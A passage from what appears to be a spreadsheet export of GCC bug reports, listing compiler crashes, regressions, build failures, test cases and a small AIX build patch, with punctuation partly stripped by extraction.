/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x4df07e]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951(gfc_reduce_init_expr+0x78)[0x4df8f8]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951(gfc_match_init_expr+0x5a)[0x4df95a]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951(gfc_match_data_decl+0xde4)[0x4d28b4]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x51609a]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x51680a]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x517d35]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x5190e5]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x51a799]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951(gfc_parse_file+0x3ff)[0x51b6df]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x554136]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951(toplev_main+0xd82)[0x7b2752]
/lib/libc.so.6(__libc_start_main+0xfd)[0x2b66690d8c4d]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x4b5319]
======= Memory map: ========
...
f951: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mhp77</t>
  </si>
  <si>
    <t>GCC-59614</t>
  </si>
  <si>
    <t>[4.9 regression] Explostion in compile time of heavily templated code</t>
  </si>
  <si>
    <t>4.9 takes forever to compile code which compiles in 9 seconds by version 4.8.2.
gdb shows that g++ spends time in mark_type_abi_tags function which was introduced in http://gcc.gnu.org/git/?p=gcc.gita=commith=9181c3d9ceed054efd8488eaea91d89353bb8d21
If I read patch correctly 4.9 visits all template arguments recursively for every template instantiation but 4.8 didn't at least not in check_abi_tags.
I created following somewhat pathological but still correct test case with help of Boost.MPL and Boost.Fusion to make very deep template with high number of occurrences of same templates in different parts of that template tree you can find it in this ticket attachment (had to compress it otherwise it wouldn't fit into bugzilla's 1000K size limit).
Version I was testing on is:
GNU C++ (SUSE Linux) version 4.9.0 20131210 [trunk revision 205857] (x86_64-suse-linux)
	compiled by GNU C version 4.9.0 20131210 [trunk revision 205857] GMP version 5.1.2 MPFR version 3.1.2 MPC version 1.0
Thank you for your time.</t>
  </si>
  <si>
    <t>ivanov.maxim</t>
  </si>
  <si>
    <t>GCC-8276</t>
  </si>
  <si>
    <t>Compile fixes for gcc 3.2 on AIX</t>
  </si>
  <si>
    <t>I had to apply the following patches to get GCC 3.2 compiling on AIX
5.  With this patch the source compiled out of the box.  Please apply
in the next version of GCC.
diff -ur src-3.2/gcc/dependence.c src-3.2-local/gcc/dependence.c
--- src-3.2/gcc/dependence.c    2002-01-22 22:57:22.000000000 +0100
+++ src-3.2-local/gcc/dependence.c      2002-10-14 19:17:15.000000000 +0200
@@ -11437 +11439 @@
     return 0
 }
+#ifndef abs /* It is defined in  on AIX */
 #define abs(N) ((N) &lt; 0 ? -(N) : (N))
+#endif /* not abs */
 /* Determine the DIRECTION and DISTANCE dependency for subscript SUB of
    inputs ICOEFFICIENTS and outputs OCOEFFICIENTS of loop LOOP_PTR using
diff -ur src-3.2/gcc/config.in src-3.2-local/gcc/config.in
--- src-3.2/gcc/config.in       2002-08-14 11:31:10.000000000 +0200
+++ src-3.2-local/gcc/config.in 2002-10-14 15:35:00.000000000 +0200
@@ -337 +339 @@
 #undef HAVE_VFORK_H
 /* Define as __inline if that's what the C compiler calls it.  */
+#ifndef inline /* avoid conflict with include/ansidecl.h */
 #undef inline
+#endif /* not inline */
 /* Define if your C compiler doesn't accept -c and -o together.  */
 #undef NO_MINUS_C_MINUS_O
diff -ur src-3.2/libiberty/config.in src-3.2-local/libiberty/config.in
--- src-3.2/libiberty/config.in 2001-11-28 02:37:24.000000000 +0100
+++ src-3.2-local/libiberty/config.in   2002-10-14 17:46:50.000000000 +0200
@@ -137 +139 @@
 #undef HAVE_VFORK_H
 /* Define as __inline if that's what the C compiler calls it.  */
+#ifndef inline /* avoid conflict with include/ansidecl.h */
 #undef inline
+#endif /* not inline */
 /* Define to `int' if  doesn't define.  */
 #undef pid_t
Release:
gcc-3.2</t>
  </si>
  <si>
    <t>GCC-59611</t>
  </si>
  <si>
    <t>std::copy performs worse than naive implementation when copying a single known byte</t>
  </si>
  <si>
    <t>Created attachment 31524
Testcase
The attached testcase shows how using a naive implementation (mycopy) causes gcc to generate better code than using std::copy.
(Clang /does/ generate optimal code when using std::copy in this case.)</t>
  </si>
  <si>
    <t>GCC-8808</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] Internal compiler error in extract_constrain_insn_cached</t>
  </si>
  <si>
    <t>Internal compiler error while trying to use inline asm with 
MMX registers.
Release:
gcc-3.2.1
Environment:
Linux-2.4.19 glibc-2.2.4
How-To-Repeat:
g++ -o test test.cc</t>
  </si>
  <si>
    <t>ebuddington</t>
  </si>
  <si>
    <t>GCC-18574</t>
  </si>
  <si>
    <t>[4.0 Regression] bootstrap comprison failed</t>
  </si>
  <si>
    <t>With gcc 4.0 from CVS at Sat Nov 20 00:13:50 UTC 2004 I got
Bootstrap comparison failure!
./fold-const.o differs
cp/decl.o differs
make[3]: *** [gnucompare] Error 1
make[3]: Leaving directory `/export/build/gnu/gcc/build-x86_64-linux/gcc'
make[2]: *** [bootstrap] Error 2
The differences are in debug sections.</t>
  </si>
  <si>
    <t>GCC-78243</t>
  </si>
  <si>
    <t>incorrect byte offset in vextractuh with -mcpu=power9</t>
  </si>
  <si>
    <t>The test case is:
gcc.c-torture/execute/pr68532.c
#define SIZE 128
unsigned short _Alignas (16) in[SIZE]
__attribute__ ((noinline)) int
test (unsigned short sum unsigned short *in int x)
{
  for (int j = 0 j &lt; SIZE j += 8)
    sum += in[j] * x
  return sum
}
/home/sawdey/src/gcc/trunk2/build/gcc/xgcc -B/home/sawdey/src/gcc/trunk2/build/gcc/ /home/sawdey/src/gcc/trunk2/trunk/gcc/testsuite/gcc.c-torture/execute/pr68532.c -mcpu=power9 -Wl-rpath=/tmp/lib64 -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -O2 -ftree-vectorize -fno-vect-cost-model -lm -g -S -o pr68532.s
asm output is:
        vsplth 003
        lxv 33-16(4)
        vperm 111013
        vperm 111113
        xxspltib 430
        vperm 111213
        xxspltib 450
        vmladduhm 00113
        vsum4shs 0011
        vsumsws 0011
        vextractuh 000
        mfvsrd 932
        add 339
The vsumsws produces a result in word 3 of v0 so the vextractuh 3rd argument should be 14 to extract bytes 1415 in order to produce the correct result.
Another question about this code would be why we produce all this complex vector code but only use it for the first half of the computation the latter half uses this simple code:
.L2:
        lhz 90(4)
        addi 4416
        mullw 995
        add 393
.LVL4:
        rlwinm 3300xffff
.LVL5:
        .loc 1 10 0
        bdnz .L2
It seems like we could just do this for 2 vector lengths and not need this cleanup code.</t>
  </si>
  <si>
    <t>GCC-3081</t>
  </si>
  <si>
    <t>Preprocessor merges 2 first lines when -imacros is being used</t>
  </si>
  <si>
    <t>Preprocessor merges 2 first source lines (if first is not
#define) when command line option '-imacros dome_file'
is specified for preprocessor. Example is for C. It's not critical in this case but it more serious for preprocessing assembler source as it may cause syntax error
in this situation. Initially I noticed it after preprocessing assembler file (target -i586-pc-msdosdjgpp)
as I get syntax errors due to this bug. After that I 
suceeded  to reproduce the same for Linux
Andris
-----------------  foo.h  ---------------------
#define foo
-----------------  foo.c  ---------------------
int	a=0
int	b=0
-----------------  command (under Linux)  -----
cpp -v -imacros foo.h foo.c
-----------------  output  --------------------
bash-2.05$ cpp -v -imacros foo.h foo.c -o -
Reading specs from /disk2/gcctest/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../gcc/configure --prefix=/disk2/gcctest --enable-shared --verbose --enable-languages=cc++g77objc --enable-threads=posix
Thread model: posix
gcc version 3.0 20010606 (prerelease)
 /disk2/gcctest/lib/gcc-lib/i686-pc-linux-gnu/3.0/cpp0 -lang-c -v -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ -imacros foo.h foo.c -o -
GNU CPP version 3.0 20010606 (prerelease) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /disk2/gcctest/lib/gcc-lib/i686-pc-linux-gnu/3.0/include
 /disk2/gcctest/i686-pc-linux-gnu/include
 /usr/include
End of search list.
# 1 foo.c
# 1 foo.h 1
# 2 foo.c 2
int aint b
bash-2.05$
Release:
gcc-3.0 20010606
Environment:
Tested on targets targets i686-pc-linux-gnu i586-pc-msdosdjgpp
How-To-Repeat:
See description</t>
  </si>
  <si>
    <t>GCC-29494</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] libgomp build fails with missing pthread_mutexattr_settype</t>
  </si>
  <si>
    <t>libgomp fails to build on Solaris 2.6 because it lacks pthread_mutexattr_settype
and PTHREAD_MUTEX_EXCLUSIVE in @(#)pthread.h  1.16    97/05/05 SMI.
Solaris 2.8 @(#)pthread.h  1.28    99/11/15 SMI has the function and define.
/devel/src/gcc-4.2-20060930.obj/./gcc/xgcc -B/devel/src/gcc-4.2-20060930.obj/./gcc/ -B/usr/local/sparc-sun-solaris2.6/bin/   -B/usr/local/sparc-sun-solaris2.6/lib/
 -isystem /usr/local/sparc-sun-solaris2.6/include
 -isystem /usr/local/sparc-sun-solaris2.6/sys-include -DHAVE_CONFIG_H
 -I. -I../../../gcc-4.2-20060930/libgomp -I. -I../../../gcc-4.2-20060930/libgomp/config/posix  -I../../../gcc-4.2-20060930/libgomp
 -Wall -Werror -O2 -g -O2 -MT 
lock.lo -MD -MP -MF .deps/lock.Tpo -c ../../../gcc-4.2-20060930/libgomp/config/posix/lock.c  -fPIC -DPIC -o .libs/lock.o
cc1: warnings being treated as errors
../../../gcc-4.2-20060930/libgomp/config/posix/lock.c: In function 'omp_init_nest_lock':
../../../gcc-4.2-20060930/libgomp/config/posix/lock.c:78: warning: implicit declaration of function 'pthread_mutexattr_settype'
../../../gcc-4.2-20060930/libgomp/config/posix/lock.c:78: error: 'PTHREAD_MUTEX_RECURSIVE' undeclared (first use in this function)
../../../gcc-4.2-20060930/libgomp/config/posix/lock.c:78: error: (Each undeclared identifier is reported only once
../../../gcc-4.2-20060930/libgomp/config/posix/lock.c:78: error: for each function it appears in.)
make[4]: *** [lock.lo] Error 1</t>
  </si>
  <si>
    <t>rbrown</t>
  </si>
  <si>
    <t>GCC-55327</t>
  </si>
  <si>
    <t>[4.8 regression] FAIL: gcc.dg/vect/slp-perm-8.c scan-tree-dump-times vect vectorized 1 loops 2</t>
  </si>
  <si>
    <t>After r192987 the following tests started failing on arm-none-eabi:
FAIL: gcc.dg/vect/slp-perm-8.c scan-tree-dump-times vect vectorized 1 loops 2
FAIL: gcc.dg/vect/slp-perm-8.c scan-tree-dump-times vect vectorizing stmts using SLP 1
One more loop is now vectorized using SLP.  
Similarly the following test started failing:
FAIL: gcc.dg/vect/slp-perm-9.c scan-tree-dump-times vect permutation requires at least three vectors 1
This message appears twice in the dump file instead of just once as expected.</t>
  </si>
  <si>
    <t>gretay</t>
  </si>
  <si>
    <t>GCC-47447</t>
  </si>
  <si>
    <t>[4.4 Regression] Unable to coalesce ssa_names  and  ICE in tree-ssa-coalesce.c when -O3 is used</t>
  </si>
  <si>
    <t>Created attachment 23110
This is the input file to the compiler that produces an ICE.
To reproduce use the attached file and run:
g++ -o /dev/null -S -O3 reduced.manual.inline.cc
You will get this message:
Unable to coalesce ssa_names  and  which are marked as MUST COALESCE.
This is reproducible with the latest (as of Jan 20th 2011) 4-4 branch of gcc. It seems to not happen with the trunk.</t>
  </si>
  <si>
    <t>asharif</t>
  </si>
  <si>
    <t>GCC-48526</t>
  </si>
  <si>
    <t>[C++0x] std::is_constructible::value shall be false</t>
  </si>
  <si>
    <t>According to N3242 20.9.4.3 clause 6 the expression
std::is_constructible::value
shall be false for any type pack 'Args'
because a variable definition
void t( create... )
is ill-formed given the following function prototype:
template 
  typename std::add_rvalue_reference::type create()
But gcc-4.6.0 rejects all following static_assert:
---------------------
#include 
int main()
{
  static_assert( !std::is_constructible::value  )
  static_assert( !std::is_constructible::value  )
  static_assert( !std::is_constructible::value  )
}</t>
  </si>
  <si>
    <t>gintensubaru</t>
  </si>
  <si>
    <t>GCC-56388</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 regression] catch(...) in lambda rejected</t>
  </si>
  <si>
    <t>g++ -std=c++11 rejects the following program:
int main()
{
    bool /*const*/ condition = false
    [&amp;]{
        try{}
        catch(...){
            if(condition){}
        }
    }()
}
If the condition variable is const the compilation successes.
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/user/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/home/user/gcc-trunk --disable-bootstrap --disable-multilib --enable-languages=cc++fortran --with-gmp=/home/user/gcc-trunk/src/build/backends --with-mpfr=/home/user/gcc-trunk/src/build/backends --with-mpc=/home/user/gcc-trunk/src/build/backends
Thread model: posix
gcc version 4.8.0 20130219 (experimental) (GCC)</t>
  </si>
  <si>
    <t>omawarisan.bokudesu</t>
  </si>
  <si>
    <t>GCC-3199</t>
  </si>
  <si>
    <t>Wrong expansion of __STRICT_ANSI__ in cpp.texi</t>
  </si>
  <si>
    <t xml:space="preserve">	cpp.texi @item __STRICT_ANSI__ says:
		Its definition is the null string.
	However `gcc -ansi' defines `__STRICT_ANSI__' as `1'.
Release:
3.0 20010611 (prerelease)
Environment:
System: SunOS bombur.uio.no 5.8 Generic_108528-03 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ./configure --quiet
How-To-Repeat:
	$ echo '[__STRICT_ANSI__]' | ./xgcc -B./ -E -P -ansi -xc -
	[1]</t>
  </si>
  <si>
    <t>GCC-9600</t>
  </si>
  <si>
    <t>[3.2 regression] ICE with typedefs in template class</t>
  </si>
  <si>
    <t>this is the second bug report i'm not able to use that gccbug thing. sorry.
first the command line: g++ -I./include core.cpp
it will not link either. it only should compile. (but i'm not shure if
my code is leagle)
now the output:
In file included from core.cpp:24:
plugin.hpp: In instantiation of `plugin':
core.hpp:57:   instantiated from here
plugin.hpp:56: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
and so i went here.
IMHO the typedefs (in the plugin class) are the problem if i take
them out all works fine.
this time the preprocessed code is attached.
sorry for my borken english.
Release:
3.2.2 (Debian testing/unstable)
Environment:
System: Linux beowulf 2.4.20 #1 Don Jan 30 17:41:06 CET 2003 i686 unknown unknown GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protopascalobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --disable-__cxa_atexit --enable-java-gc=boehm --enable-objc-gc i386-linux
Unformatted:
 --i7F3eY7HS/tUJxUd
 Content-Type: multipart/mixed boundary=qcHopEYAB45HaUaB
 Content-Disposition: inline
 --qcHopEYAB45HaUaB
 Content-Type: text/plain charset=iso-8859-15
 Content-Disposition: inline</t>
  </si>
  <si>
    <t>GCC-82993</t>
  </si>
  <si>
    <t>ICE in free_expr0 at fortran/expr.c:445</t>
  </si>
  <si>
    <t>With a wrong parameter definition :
$ cat z1.f90
program p
   type t
      real :: a(3)
   end type
   type(t) parameter :: z = 1
   print * z%a(1)
   print * z%a
end
$ gfortran-8-20171112 -c z1.f90
f951: internal compiler error: Segmentation fault
0xb61c7f crash_signal
        ../../gcc/toplev.c:325
0x69268b free_expr0
        ../../gcc/fortran/expr.c:445
0x6926ad gfc_free_expr(gfc_expr*)
        ../../gcc/fortran/expr.c:518
0x6efd59 gfc_match_rvalue(gfc_expr**)
        ../../gcc/fortran/primary.c:3250
0x6c655e match_primary
        ../../gcc/fortran/matchexp.c:157
0x6c655e match_level_1
        ../../gcc/fortran/matchexp.c:211
0x6c655e match_mult_operand
        ../../gcc/fortran/matchexp.c:267
0x6c67a8 match_add_operand
        ../../gcc/fortran/matchexp.c:356
0x6c6a3c match_level_2
        ../../gcc/fortran/matchexp.c:480
0x6c6b92 match_level_3
        ../../gcc/fortran/matchexp.c:551
0x6c6ca4 match_level_4
        ../../gcc/fortran/matchexp.c:599
0x6c6ca4 match_and_operand
        ../../gcc/fortran/matchexp.c:693
0x6c6e62 match_or_operand
        ../../gcc/fortran/matchexp.c:722
0x6c6f52 match_equiv_operand
        ../../gcc/fortran/matchexp.c:765
0x6c7042 match_level_5
        ../../gcc/fortran/matchexp.c:811
0x6c63b1 gfc_match_expr(gfc_expr**)
        ../../gcc/fortran/matchexp.c:870
0x6af7a9 match_io_element
        ../../gcc/fortran/io.c:3542
0x6af9f3 match_io_list
        ../../gcc/fortran/io.c:3581
0x6b4214 match_io
        ../../gcc/fortran/io.c:4242
0x6b592a gfc_match_print()
        ../../gcc/fortran/io.c:4298</t>
  </si>
  <si>
    <t>GCC-41438</t>
  </si>
  <si>
    <t>[4.5 Regression] VTA: libgomp build fails due to inconsistent debug info</t>
  </si>
  <si>
    <t>If I compile the included two C files on IA64 HP-UX and then link them into
a shared library using the HP linker I get an error from the HP linker.
$ gcc -mlp64 -shared -fPIC -O2 -g x.c y.c
ld: Non TP-relative relocation for the thread local storage symbol gomp_tls_data
1 errors.
collect2: ld returned 1 exit status
While I do not get this error on IA64 Linux the compiler does generate the same debug information as on HP-UX the linker just doesn't complain.
If I look at the generated assembly code for x.c and y.c the .debug_info
section of x.c contains:
        data8.ua        gomp_tls_data#+8
while the .debug_info section of y.c contains:
        data8.ua        @dtprel(gomp_tls_data#)
If I change x.s by hand to use dtprel then the HP linker does not complain.
Here are the two C files x.c and y.c:
============ x.c =============
struct gomp_team_state { }
struct gomp_thread
{
  void (*fn) (void *data)
  struct gomp_team_state ts
}
extern __thread struct gomp_thread gomp_tls_data
inline struct gomp_thread *gomp_thread (void)
{
  return 
}
GOMP_parallel_end (void)
{
  struct gomp_team_state *ts = 
}
========== y.c ===============
struct gomp_team_state { }
struct gomp_thread
{
  void (*fn) (void *data)
  struct gomp_team_state ts
}
__thread struct gomp_thread gomp_tls_data</t>
  </si>
  <si>
    <t>GCC-10098</t>
  </si>
  <si>
    <t>gcc internal error: illegal instruction</t>
  </si>
  <si>
    <t>Trying to compile wxWindows 2.4.0 on Win98SE with Cygwin's latest gcc.
I did configure make and the compile line below fails.
Here is the error message:
src/png/pngread.c: In function `png_read_info':
src/png/pngread.c:509: internal error: Illegal instruction
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [pngread.o] Error 1
I attach pngread.i.
I must admit Win98SE is not a very stable development platform so it might just be something wild unrelated to gcc.  On the other hand I've tried rebooting several times and this file just cannot be compiled by me.
Release:
gcc version 3.2 20020927 (prerelease)
Environment:
Latest Cygwin (as of 3/13/2003) on Windows 98 SE.
How-To-Repeat:
The compile line that fails:
gcc -c   -I./lib/wx/include/msw-2.4 -I./include -I./src/png -D_WIN32_IE=0x400    -D__WIN95__ -D__WXMSW__ -DWXUSINGDLL=1  -fno-pcc-struct-return -O2 -MMD -Wall -UWXUSINGDLL -DWXMAKINGDLL=1 -D_DLL=1 -D_WINDLL=1 -o pngread.o ./src/png/pngread.c</t>
  </si>
  <si>
    <t>dfrankow</t>
  </si>
  <si>
    <t>GCC-15261</t>
  </si>
  <si>
    <t>[tree-ssa] [regression] ICE on code containing constant OBJC Strings</t>
  </si>
  <si>
    <t>Since my patch has gone unreviewed I decided to file a bug for the patch: &lt;http://
gcc.gnu.org/ml/gcc-patches/2004-04/msg00743.html&gt;.
The testcases are already in the testsuite.</t>
  </si>
  <si>
    <t>GCC-44140</t>
  </si>
  <si>
    <t>ObjC lto/whopr fails</t>
  </si>
  <si>
    <t>On Linux/ia32 I got
Executing on host: /export/build/gnu/gcc/build-i686-linux/gcc/xgcc -B/export/build/gnu/gcc/build-i686-linux/gcc/ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/objc.dg/torture/tls/thr-init-3.m   -O2 -flto  -fgnu-runtime -I/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/../../libobjc  -B/export/build/gnu/gcc/build-i686-linux/i686-pc-linux-gnu/./libobjc/.libs   -L/export/build/gnu/gcc/build-i686-linux/i686-pc-linux-gnu/./libobjc/.libs   /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/objc.dg/torture/tls/../../../objc-obj-c++-shared/Object1.m  -lobjc -lm   -o ./thr-init-3.exe    (timeout = 300)
/tmp/cc0nTyTC.lto.o:(.data+0xa0): undefined reference to `_OBJC_METACLASS_tsObj.2114'^M
/tmp/cc0nTyTC.lto.o:(.data+0xfc): undefined reference to `_OBJC_CLASS_tsObj.2110'^M
/tmp/cc0nTyTC.lto.o:(.data+0x104): undefined reference to `__objc_class_name_tsObj'^M
collect2: ld returned 1 exit status^M</t>
  </si>
  <si>
    <t>GCC-30918</t>
  </si>
  <si>
    <t>Failure to skip commented out NAMELIST</t>
  </si>
  <si>
    <t>Hi
when reading a namelist from a file gfortran does not
skip a commented out entry as in
!&amp;REPORT use      = 'ignore'   /        ! Commented out ignore this one!
!
 &amp;REPORT type     = 'SYNOP' 
         use      = 'active'
         max_proc = 20
 /
The attached program demonstrates that gfortran reads
the first entry although it should be skipped.</t>
  </si>
  <si>
    <t>GCC-33362</t>
  </si>
  <si>
    <t>[4.3 Regression] Bootstrap comparison failure (rev. 128287)</t>
  </si>
  <si>
    <t>Mainline revision 128287.
Configured with:
% ../gcc/configure --enable-languages=cc++fortran
bootsrapped with:
% make -j 8
Comparing stages 2 and 3
/home/victork/mainline/build.128287/stage3-gcc
warning: ./cc1plus-checksum.o differs
warning: ./cc1-checksum.o differs
Bootstrap comparison failure!
./cfg.o differs
./cfgloopmanip.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/home/victork/mainline/build.128287'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/home/victork/mainline/build.128287'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>victork</t>
  </si>
  <si>
    <t>GCC-45152</t>
  </si>
  <si>
    <t>LTO breaks C99 inline</t>
  </si>
  <si>
    <t>The C99-code
        inline int f()
        {
            return 5
        }
        extern inline int f()
is expected to define an externally callable function f. With
        gcc -std=c99 -c test.c
it compiles just fine and emits f. However with LTO
        gcc -std=c99 -flto -c test.c
the function f is not emitted.</t>
  </si>
  <si>
    <t>jk4736</t>
  </si>
  <si>
    <t>GCC-1789</t>
  </si>
  <si>
    <t>ICE in switch statement case</t>
  </si>
  <si>
    <t>One case of a switch statement using an enum as the switch variable causes an exception.  Removing that case and putting it in an if statement ahead of the switch is the work around.
Release:
gcc version gcc-2.96 19990621 (experimental)
Environment:
gcc-lib/sh-wrs-vxworks
running under Cywin on NT
How-To-Repeat:
c++sh  -O -fno-builtin -m3 -ml -Wall  -c -o pr_report.o pr_report.ii</t>
  </si>
  <si>
    <t>erik.horsley</t>
  </si>
  <si>
    <t>GCC-68390</t>
  </si>
  <si>
    <t>[5 Regression] Incorrect code due to indirect tail call of varargs function with hard float ABI</t>
  </si>
  <si>
    <t>__attribute__ ((noinline))
double direct(int x ...)
{
  return x*x
}
__attribute__ ((noinline))
double broken(double (*indirect)(int x ...) int v)
{
  return indirect(v)
}
int main ()
{
  double d1 d2
  int i = 2
  d1 = broken (direct i)
  if (d1 != i*i)
    {
      __builtin_abort ()
    }
  return 0
}
Please note that we have a sibcall from broken to indirect.
direct is variadic function so it is conforming to AAPCS base standard.
broken is a non-variadic function and will return the value in
floating point register for TARGET_HARD_FLOAT. Thus we should not be
doing sibcall here.</t>
  </si>
  <si>
    <t>GCC-61445</t>
  </si>
  <si>
    <t>[4.10 Regression][C++11] ice in instantiate_decl at cp/pt.c:19770</t>
  </si>
  <si>
    <t>This appears to be a recent regression in trunk.
Source reduced from llvm/tools/clang/tools/clang-check/ClangCheck.cpp
Using trunk @r211286:
gcc-svn-r211286/bin/g++ -c t1.ii -std=c++11
t1.ii: In instantiation of â€˜void newFrontendActionFactory(FactoryT* int*)::A::m_fn1() [with FactoryT = int]â€™:
t1.ii:18:5:   required from â€˜void newFrontendActionFactory(FactoryT* int*) [with FactoryT = int]â€™
t1.ii:19:33:   required from here
t1.ii:11:13: internal compiler error: in instantiate_decl at cp/pt.c:19753
             B (0 0)
             ^
0x5c6d0f instantiate_decl(tree_node* int bool)
	../../gcc/cp/pt.c:19752
0x63cda3 mark_used(tree_node* int)
	../../gcc/cp/decl2.c:5016
0x557f73 build_over_call
	../../gcc/cp/call.c:7335
0x563880 build_new_method_call_1
	../../gcc/cp/call.c:8047
0x563880 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc/cp/call.c:8117
0x564959 build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
	../../gcc/cp/call.c:7661
0x607df6 build_functional_cast(tree_node* tree_node* int)
	../../gcc/cp/typeck2.c:1935
0x5bbf86 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:14415
0x5ca963 tsubst_expr
	../../gcc/cp/pt.c:14133
0x5cad61 tsubst_expr
	../../gcc/cp/pt.c:13559
0x5caf03 tsubst_expr
	../../gcc/cp/pt.c:13731
0x5c8503 instantiate_decl(tree_node* int bool)
	../../gcc/cp/pt.c:20043
0x5caa2b tsubst_expr
	../../gcc/cp/pt.c:13872
0x5ca273 tsubst_expr
	../../gcc/cp/pt.c:13545
0x5caf03 tsubst_expr
	../../gcc/cp/pt.c:13731
0x5c8503 instantiate_decl(tree_node* int bool)
	../../gcc/cp/pt.c:20043
0x601387 instantiate_pending_templates(int)
	../../gcc/cp/pt.c:20159
0x63e7ef cp_write_global_declarations()
	../../gcc/cp/decl2.c:4348
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The crash does not reproduce without -std=c++11 nor using trunk build @r210629.
/// -- cut ---
template  void newFrontendActionFactory (FactoryT * int * = 0)
int a
template 
void newFrontendActionFactory (FactoryT * int *)
{
    class A
    {
        void m_fn1 ()
        {
            B (0 0)
        }
        class B
        {
        public:
            B (FactoryT int)
        }
    }
    newFrontendActionFactory (
}</t>
  </si>
  <si>
    <t>GCC-17213</t>
  </si>
  <si>
    <t>wrong unaligned 32 bits 'mov' opcode generated when fetching a ushort</t>
  </si>
  <si>
    <t>When compiled with -O3 optimization flag the *it != 0xff expression in the
following function generates an unaligned 'movd' instruction fetching a 32 bits
value instead of a 'movw' instruction fetching a 16 bits value.
void append(DynArray* dyn unsigned short* array int len) {
  unsigned short* it
  unsigned short* end = array + len
  for (it = array (len &lt; 0 || (it &lt; end))  it++) {
    DynArrayAdd(dyn *it) 
  }
}
The test expression '*it != 0xff' is compiled into the following assembly code:
    40000692:	44 8b 65 00          	mov    0x0(%rbp)%r12d
    40000696:	66 41 81 fc ff 00    	cmp    $0xff%r12w
If the memory page located just after 'array' is mprotect'ed this function
triggers a SEGV signal.
To reproduce this bug compile the test program on a Linux AMD64 box with the
following command line:
gcc -g -O3 -m64 -o test-boundary-opt test-boundary.c test-boundary-main.c
Additional information:
if test-boundary.c and test-boundary-main.c are merged together in the same
source file the 'append' function is inlined into 'main' and the code produced
is correct:
    400006f5:   0f b7 2b                movzwl (%rbx)%ebp
    400006f8:   66 81 fd ff 00          cmp    $0xff%bp
Please find below the uuencoded tar.bz2 archive of the files needed to reproduce
the bug.
begin 660 test-boundary.tar.bz2
M0EIH.3%!629369AQ!)0!71_____________________________________
M________X%^^]P=4024*Z734-&gt;MT0%4[&gt;X`&gt;D?-@=O.=[P`8!PCMJ43K%UC
M3$$$$V$:``.V54(NN?`&gt;Y.I&amp;*A$I\#5)1%]8DOAR
M`5(``J@4O7/.T4:P`:&gt;KSN(CD`:```#N?`'T`&lt;^OM8]]N&amp;J.@-YMV%%[N$FU
MX``````'2/0NG:6N^8[F^L#SX```'
MN%(3GVX[
MSE9ANRW5V(NQ[M2J(GK16[CA=V.IU5&gt;F'90GDOIE.^Q``$-.ER:`0C2M=W'1
M=4!]]@^'T&gt;^P2`*!2V`=%4NPU1LJU+#T!T'M@/(&gt;@`!U1)=G5!BI=E'KU
MH`!UD#TZK+K][@`::#W&gt;W/`N&gt;N`=.0`WO&gt;\!=GFSUZD
M.]``=&gt;U@-%`Z$DD/4'J3``3!#0-`3``(P3$:!IH1@:F`&amp;4\$83(R8F:`)
MDPFF$8ABGZGH333838C0FVDF:3R3U-B#330(-3`922!-8F2&gt;HU#29#0-
M```$P`3`````````````!&amp;FF````````3$P``2F)!@1H:4]-)D3U!H:`
M:#-09@#T(#(&amp;GJ``#0&amp;@``````````#0``````````%34J1()ZB:GI/:B9I
M-03T@:::&amp;FC(-`:`T`&amp;@``````````&amp;@T``````!H`````$21`@B
M8F@`3(TT::F!--`(P2&gt;IZFF`I^H-3]3*8T:)Z8TB8RCU/28C9(S283U`&gt;C4
M-#(R#0&amp;@:--#0&gt;ID`P(T```]30!44(0(`(`(39&amp;FDTR$R-*&gt;J&gt;F)B:--)Z
